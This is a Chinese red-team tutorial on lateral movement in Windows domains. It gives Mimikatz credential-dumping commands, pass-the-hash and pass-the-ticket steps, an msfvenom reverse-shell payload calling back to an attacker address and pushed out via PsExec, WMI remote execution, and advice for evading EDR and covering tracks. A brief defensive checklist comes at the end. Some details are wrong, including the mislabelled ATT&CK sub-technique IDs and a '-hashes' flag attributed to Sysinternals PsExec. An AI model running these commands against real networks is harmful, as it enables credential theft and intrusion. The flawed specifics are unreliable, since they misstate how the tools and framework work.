红队视角下内网渗透中的 “横向移动” 实战指南
字数 3595 2025-10-26 18:21:34
红队视角:内网渗透横向移动实战教学指南
第一章:横向移动基础概念与战术定位
1.1 横向移动的定义
横向移动 是指攻击者在成功入侵一台主机后,以该主机为跳板,在网络内部进一步扩展访问权限、控制其他系统或服务的过程。其本质是从“单点突破”迈向“全网控制”的核心环节。
- 起点:初始被控主机(如通过钓鱼邮件获取的普通用户权限的主机)。
- 终点:域控制器、数据库服务器、关键业务主机等高价值资产。
- 核心:不依赖外部流量,而是利用已获取的凭证、系统漏洞或配置缺陷在内部网络中进行传播。
1.2 在MITRE ATT&CK框架与攻击链中的定位
-
MITRE ATT&CK ID: T1021 - Lateral Movement
- T1021.001: Remote Services (如 RDP, SSH)
- T1021.002: Exploitation of Remote Services (如 SMB 漏洞)
- T1021.003: Use of Web Protocols
- T1021.004: Valid Accounts (Pass-the-Hash / Pass-the-Ticket)
-
在红队攻击链中的承上启下作用:
| 攻击阶段 | 目标 | 横向移动的作用 |
|---|---|---|
| 侦察 (Reconnaissance) | 获取IP段、开放端口、用户信息 | 提供后续可利用的目标列表 |
| 突破 (Initial Access) | 获取第一台主机控制权 | 成为横向移动的起点和跳板 |
| 持久化 (Persistence) | 维持长期访问权 | 增加攻击面,便于反复尝试横向移动 |
| 横向移动 (Lateral Movement) | 扩展权限和控制范围 | 实现从低权限到高权限跨越的关键一步 |
| 数据窃取 (Exfiltration) | 获取敏感数据 | 必须建立在对目标网络的广泛控制之上 |
结论:没有有效的横向移动,红队行动将停留在“单机沦陷”阶段,无法形成真正的内网威胁。
1.3 红队策略选择
红队制定横向移动策略时,需综合考虑目标优先级、检测规避能力、可用资源和时间成本。
策略类型对比:
| 策略类型 | 描述 | 风险 | 适用场景 | 工具举例 |
|---|---|---|---|---|
| 主动探测型 | 扫描端口 → 暴力破解 → 登录 | 高 | 初始阶段缺乏有效凭证 | Nmap, Hydra, CrackMapExec |
| 被动利用型 | 利用已知凭证(哈希、票据)直接跳转 | 低 | 已通过提权等手段获得凭证 | Mimikatz, PsExec, WMI |
不同环境下的策略差异:
| 环境类型 | 推荐策略 | 原因 | 示例 |
|---|---|---|---|
| 低权限环境 | 优先利用漏洞 | 权限不足,难以暴力破解 | Metasploit (如 MS17-010) |
| 高权限环境 | 凭据重用 (PTH) | 权限足够,隐蔽性高 | Mimikatz + PsExec/WMI |
| 禁用RDP/SSH | IPC$连接 + 文件共享枚举 | 不依赖常见远程管理协议 | net use 命令 |
| 存在EDR/AV | 免杀技术(内存注入) | 规避行为检测 | 免杀版Mimikatz, PowerShell加载器 |
实践建议:
- 信息收集先行:使用工具(如
CrackMapExec)快速摸清网络环境。crackmapexec smb 192.168.1.0/24 -u 'user' -p 'password' - 路径规划:使用 BloodHound 或 SharpHound 绘制Active Directory拓扑图,找出攻击路径。
- 最小化原则:遵循“最小代价,最大收益”,灵活切换策略。
第二章:主流横向移动技术详解与实战
2.1 凭证窃取与重用
这是最核心、最高效的横向移动技术。
A. 核心概念
- Pass-the-Hash (PTH): 直接使用从内存或文件中提取的 NTLM Hash 进行身份验证,无需明文密码。
- Pass-the-Ticket (PTT): 利用 Kerberos 票据 进行认证,绕过密码验证。
B. Windows身份验证机制简析
- NTLM认证:基于挑战-响应模式,核心是使用NTLM Hash加密随机挑战值。一旦攻击者获取Hash,即可模拟用户身份。
- Kerberos认证:基于票据(Tickets)体系。攻击者可提取内存中的有效票据(TGT/ST)并注入到自己会话中,实现免密访问。
C. 实战演示:Mimikatz + PTH
步骤一:使用Mimikatz提取凭证
在已控主机上(需管理员或SYSTEM权限)运行:
mimikatz.exe
privilege::debug # 提升权限
sekurlsa::logonPasswords # 抓取内存中的密码和Hash
输出示例:
Authentication ID : 0 ; 117798
Account Name : administrator
Account Domain : CYBER.COM
NTLM : bf056feb4349eff2d9761e322d6178dd
步骤二:使用PsExec进行PTH
利用提取的NTLM Hash远程执行命令:
psexec.exe \\192.168.1.100 -u CYBER\administrator -p "" -hashes :bf056feb4349eff2d9761e322d6178dd cmd.exe
-p "": 密码为空,因为使用Hash认证。-hashes: 参数格式为:NTLM_HASH。- 此命令成功将在目标主机上以SYSTEM权限打开一个命令行窗口。
D. 实战演示:Pass-the-Ticket (PTT)
步骤一:导出Kerberos票据
mimikatz.exe
privilege::debug
sekurlsa::tickets /export # 导出所有票据为 .kirbi 文件
步骤二:注入票据并访问
在攻击者机器上:
mimikatz.exe
kerberos::ptt [导出票据的路径]\ticket.kirbi # 将票据注入当前会话
kerberos::list # 验证票据是否注入成功
# 现在可以直接访问目标资源,无需密码
dir \\TARGET-SERVER.CYBER.COM\C$
E. 检测与规避
| 技术点 | 检测风险 | 规避建议 |
|---|---|---|
| Mimikatz 提取 LSASS | EDR 会监控对 lsass.exe 的异常访问 | 使用进程注入技术(如注入到 svchost.exe) |
| PTH 登录 | 安全日志记录事件ID 4624(登录类型3) | 使用 WMI/WinRM 替代 PsExec;使用代理隐藏源IP |
| PTT 票据注入 | 票据使用时间/地点异常 | 确保时间同步,避免频繁更换票据 |
2.2 远程执行技术
技术对比:
| 技术 | 协议/依赖 | 特点 | 检测风险 |
|---|---|---|---|
| PsExec | SMB/RPC | 功能强大,是官方工具 | 高(日志记录清晰) |
| WMI | CIM/WS-Management | 系统原生,PowerShell集成 | 中(产生大量日志) |
| WinRM | HTTP/HTTPS | 加密通信,现代管理标准 | 低(若配置SSL则更隐蔽) |
实战案例一:PsExec 注入 svchost.exe 规避检测
- 生成Payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f exe > reverse.exe - 使用PsExec注入执行:
psexec -accepteula \\192.168.10.2 -u administrator -hashes :HASH -s -d -i -c "reverse.exe"-s: 以 SYSTEM 权限运行。-d: 不等待进程结束。-i: 交互式会话。-c: 将文件复制到目标并执行。- 效果:Payload 在目标的
svchost.exe进程中运行,极大降低了被EDR检测的概率。
实战案例二:PowerShell + WMI 远程执行
通过WMI在远程主机上执行PowerShell命令或脚本。
Invoke-WmiMethod -ComputerName 192.168.10.2 -Class Win32_Process -Name Create -ArgumentList "powershell.exe -c `"Get-Process > C:\temp\output.txt`""
此命令在目标主机上执行PowerShell命令,并将进程列表输出到文件。WMI非常适合用于无文件攻击和远程脚本执行。
第三章:防御视角与总结
3.1 关键防御建议
- 最小权限原则:严格限制本地管理员权限,避免域内密码重复使用。
- 网络分段:将关键资产隔离在不同的网段,限制横向移动的范围。
- 强化认证:部署 LAPS 确保每台主机本地管理员密码不同;启用 Windows Defender Credential Guard 保护内存中的凭证。
- 深度监控:部署EDR/NDR产品,重点关注事件ID(如4624、4625、4688、4104),并设置异常行为告警。
- 漏洞管理:及时修补如永恒之蓝(MS17-010)这类可用于横向移动的高危漏洞。
- 禁用不必要的服务:关闭非必需的SMB、WMI、WinRM等服务。
3.2 教学总结
横向移动是内网渗透的灵魂。红队成功的核心在于:
- 深刻的原理理解:掌握NTLM/Kerberos认证流程是理解PTH/PTT的基础。
- 灵活的工具运用:熟练使用Mimikatz、PsExec、WMI、CrackMapExec等工具。
- 清晰的战术思维:始终以信息收集为先导,利用BloodHound等工具进行路径规划,选择最隐蔽、最有效的技术组合。
- 持续的规避意识:在每一步操作中都要考虑如何绕过防御和清除痕迹。
本指南提供了从基础到实战的完整知识框架,实践者应在授权的测试环境中反复演练,才能真正掌握内网横向移动的精髓。